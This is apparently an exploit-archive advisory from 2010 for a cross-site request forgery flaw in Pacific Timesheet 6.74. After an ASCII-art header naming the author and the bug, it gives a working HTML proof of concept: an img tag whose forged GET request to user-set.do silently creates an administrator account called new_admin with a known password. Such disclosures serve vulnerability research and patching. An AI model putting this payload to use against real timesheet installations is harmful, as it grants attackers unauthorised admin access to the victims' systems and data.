Home / os / win7

pacifictimesheet-xsrf.txt

Posted on 27 May 2010

<!--=========================================================================================================#
#   _      _   __   __       __        _______    _____      __ __     _____     _      _    _____  __ __    #
#  /_/  /\_ /\_ /\_     /\_     /\_______) ) ___ (    /_/\__/  ) ___ (   /_/  /\_ /\_____/_/\__/  #
#  ) ) )( ( ( /_/( ( (    ( ( (     (___  __// /\_/    ) ) ) ) )/ /\_/   ) ) )( ( (( (_____/) ) ) ) ) #
# /_/ //\ \_ /\_\ \_     \_      / / /   / /_/ (_  /_/ /_/ // /_/ (_ /_/ //\ \_\ \__ /_/ /_/_/  #
#   /   / // / // / /__  / / /__   ( ( (      )_/ / /   \_/   )_/ / /  /   / // /__/_      #
#  )_) / (_(( (_(( (_____(( (_____(          /_/ /   )_) )     /_/ /  )_) / (_(( (_____)_) )   #
#  \_/  /_/ /_/ /_____/ /_____/   /_/_/     )_____(    \_/      )_____(   \_/  /_/ /_____/\_/ \_/ #
#                                                                                                            #
#============================================================================================================#
#                                                                                                            #
# Vulnerability............Cross-site Request Forgery                                                        #
# Software.................Pacific Timesheet 6.74                                                            #
# Download.................http://www.pacifictimesheet.com/downloads/timesheet-win.exe                       #
# Date.....................5/22/10                                                                           #
#                                                                                                            #
#============================================================================================================#
#                                                                                                            #
# Site.....................http://cross-site-scripting.blogspot.com/                                         #
# Email....................john.leitch5@gmail.com                                                            #
#                                                                                                            #
#============================================================================================================#
#                                                                                                            #
# ##Description##                                                                                            #
#                                                                                                            #
# A cross-site request forgery vulnerability in Pacific Timesheet 6.74 can be exploited via GET request to   #
# create a new admin.                                                                                        #
#                                                                                                            #
#                                                                                                            #
# ##Proof of Concept##                                                                                       #
#                                                                                                          -->
<html>
<body>
<img src="http://localhost/timesheet/user/user-set.do?userId=0&flag=&cloneId=&wizard-page=1&loginX=new_admin&passwordX=password&passwordConfirmX=password&firstName=&lastName=a&uid=&status=A&roleId=1&type=&policyId=1&jobTitle=&groupId=0&billRateId=0&billRate=&payRateId=0&payRate=&salary=&firstDay=5%2F22%2F2010&lastDay=&scheduledDay%5B1%5D=on&scheduledDay%5B2%5D=on&scheduledDay%5B3%5D=on&scheduledDay%5B4%5D=on&scheduledDay%5B5%5D=on&scheduledHours=&scheduledHoursPerDay=&scheduledIn=&scheduledOut=&email=&phone=&mobile=&fax=&timeSheetId=1&carryForward=1&timeFormat=0&locale=en_US&timeZone=America%2FNew_York&apprv0Id=0&apprv0bId=0" />
</body>
</html>

 

TOP